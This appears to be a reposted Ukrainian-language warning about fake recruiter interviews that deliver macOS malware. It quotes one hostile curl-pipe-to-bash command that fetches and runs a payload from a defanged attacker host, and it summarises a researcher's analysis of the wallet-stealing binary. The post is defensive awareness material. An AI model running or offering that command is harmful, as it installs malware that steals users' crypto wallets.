Будьте обережні з фальшивими співбесідами. вони зараз один із найчистіших векторів доставки шкідливого програмного забезпечення.


мій брат майже потрапив цього тижня.
послідовність дій, крок за кроком:
> "рекрутер" зв’язується з ним у linkedin
> вони фактично прочитали його резюме. вони знають його стек. вони бронюють реальну співбесіду.
> за кілька годин до дзвінка: "можеш швидко переглянути нашу сторінку продукту перед тим, як поговоримо?"
> відвідування сайту запускає це у фоновому режимі:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
якщо ви введете свій пароль, коли буде запит, все закінчено.
дослідник (Darksp33d на Github) зворотно інженерив цей бінар:
> кожен рядок конфігурації зашифрований за допомогою 570 унікальних власних функцій
> після розкриття: повний сервер c2, повний список кінцевих точок і dsn для відстеження помилок Sentry, що пов’язаний із розробником за юридичним повісткою
> 276 цільових ідентифікаторів розширень Chrome, що охоплюють 188 криптовалютних гаманців
> перекриття TTP із "заразним" співбесідою з DPRK сильне
> 9/64 у virustotal. crowdstrike, sophos, malwarebytes — всі пропустили
справжні рекрутери, справжні резюме, справжні слоти для співбесід, сайт, що виглядає реальним. один рядок curl висмоктує ваші гаманці.
якщо "рекрутер" коли-небудь просить вас запустити щось у терміналі, навіть таке безневинне, як скрипт збірки перед технічним інтерв’ю, закрийте вкладку.
Переглянути оригінал
post-image
Ця сторінка може містити контент третіх осіб, який надається виключно в інформаційних цілях (не в якості запевнень/гарантій) і не повинен розглядатися як схвалення його поглядів компанією Gate, а також як фінансова або професійна консультація. Див. Застереження для отримання детальної інформації.
  • Нагородити
  • Прокоментувати
  • Репост
  • Поділіться
Прокоментувати
Додати коментар
Додати коментар
Немає коментарів
  • Закріпити